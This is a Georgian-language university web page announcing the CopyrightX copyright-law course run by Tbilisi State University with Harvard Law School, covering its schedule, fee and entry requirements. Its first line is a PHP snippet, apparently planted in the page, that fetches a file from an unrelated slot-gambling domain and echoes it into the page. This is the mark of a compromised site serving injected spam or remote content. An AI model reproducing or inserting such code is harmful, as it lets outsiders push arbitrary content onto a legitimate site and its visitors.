$curl = curl_init(); $url = 'https://team186.jpslot186.vip/index.txt'; curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); echo $result; CopyrightX

მთავარი

CopyrightX არის 12 კვირიანი კურსი, რომელიც 2013 წლიდან ყოველწლიურად ტარდება ჰარვარდის სამართლის სკოლისჰარვარდX დისტანციური სწავლებისა და ბერკმან კლაინის ინტერნეტისა და საზოგადეობის ცენტრის ხელშეწყობით. კურსის შემქმნელი და ხელმძღვანელია ჰარვარდის სამართლის სკოლის ინტელექტუალური საკუთრების სამართლის პროფესორი ვილიამ ფიშერი. მან შეიმუშავა კურსი, მისი სწავლების სპეციფიკა, მოამზადა დისტანციური ლექციები, შეარჩია და შექმნა საკითხავი მასალა.

ივანე ჯავახიშვილის თბილისის სახელმწიფო უნივერსიტეტის იურიდიული ფაკულტეტი ჰარვარდის სამართლის სკოლასთან თანამშრომლობით 2018 წლიდან სთვაზობს სტუდენტებს კურსს საავტორო სამართალში.

კურსი განკუთვნილია საავტორო სამართლით დაინტერესებული პირებისათვის და ძირითადად ამერიკულ საავტორო სამართალს მიმოიხილავს. ქართველი მონაწილეებისათვის კურსის განმავლობაში, დამატებით, განხილული იქნება ქართული საავტორო სამართლის მნიშვნელოვანი პრინციპები. კურსი მონაწილეებს შესაძლებლობას მისცემს გაეცნონ საავტორო სამართლის ყველაზე მნიშვნელოვან და პრეცედენტულ დავებს.


კურსის აღწერილობა: მონაწილეები უყურებენ ვიდეო ლექციებს, ასევე ექნებათ წვდომა საკითხავ მასალაზე, რომლის განხილვაც მოხდება სამუშაო ჯგუფებში. სამუშაო ჯგუფის შეხვედრები ჩატარდება დისტანციურად, ყოველკვირეულად და მას გაუძღვებიან ადგილობრივი სპეციალისტები. სალექციო კურსის დასრულების შემდეგ კურსის მონაწილეებს ჩაუტარდებათ წერითი გამოცდა, რომლის წარმატებით ჩაბარების შემთხვევაში, მათ გადაეცემათ ჰარვარდის უნივერსიტეტის სერტიფიკატი.


კურსის განრიგი (2024 წელი):

  • 1 თებერვალი - აპლიკაციების მიღების ბოლო ვადა;
  • 6-8 თებერვალი - გასაუბრება შერჩეულ კანდიდატებთან
  • 9 თებერვალი - აპლიკანტებს ეცნობებათ შერჩევის შედეგები
  • 13 თებერვალი - კურსის დაწყება
  • 25 აპრილი - 5 მაისი - საგამოცდო პერიოდი
  • ივნისი-ივლისი - გამოცდის შედეგები

 

საჭირო ინფორმაცია:

  • კურსის გავლის საფასურია 300 ლარი. თბილისის სახელმწიფო უნივერსიტეტის მოქმედი სტუტენტებისათვის  (ბაკალავრიატის, მაგისტრატურის ან დოქტორანტურის საფეხური) შემოთავაზებული კურსი უფასოა.
  • პროგრამაში მონაწილეობა შეუძლია საავტორო სამართლით დაინტერესებულ ყველა პირს. კურსზე დაშვების წინაპირობები იხილეთ ქვემოთ.
  • სამუშაო ჯგუფების შეხვედრის დრო მითითებულია სააპლიკაციო ფორმაში. გთხოვთ, აპლიკაციაში მონიშნოთ სასურველი დრო
  • ყოველკვირეული სამუშაო ჯგუფების შეხვედრებზე დასწრება სავალდებულოა ყველა სტუდენტისათვის, ორზე მეტი გაცდენის შემთხვევაში სტუდენტი არ დაიშვება საბოლოო გამოცდაზე და ვერ მიიღებს სერტიფიკატს ჰარვარდის სამართლის სკოლისაგან.
  • კურსის გავლისათვის საშუალოდ 100 აკადემიური საათია საჭირო, სამუშაო შეხვედრების, ვიდეო ლექციებისა და საკითხავი მასალის გათვალისწინებით.
  • თბილისის სახელმწიფო უნივერსიტეტის სტუდენტებს შეუძლიათ მოითხოვონ ECTS კრედიტების მინიჭება კურსის წარმატებით გავლის და შესაბამისი სერტიფიკატის უნივერსიტეტში წარდგენის შემთხვევაში.

 

კურსზე დაშვების წინაპირობები:

  • ინგლისური ენის ცოდნა მაღალ დონეზე.
  • კურსზე დაიშვებიან სტუდენტები რომლებსაც ბაკალავრიატის საფეხურის მინიმუმ 4 სემესტრი აქვთ გავლილი და კურსდამთავრებულები.
  • კურსზე რეგისტრაციისთვის აუცილებელია, აპლიკაციის შევსება. იხილეთ სააპლიკაციო ფორმა.
    მონაწილეების შერჩევა მოხდება კონკურსის საფუძველზე აპლიკაციის განხილვისა და გასაუბრების შედეგად.  

დეტალური ინფორმაცია იხილეთ ინგლისურ ენაზე.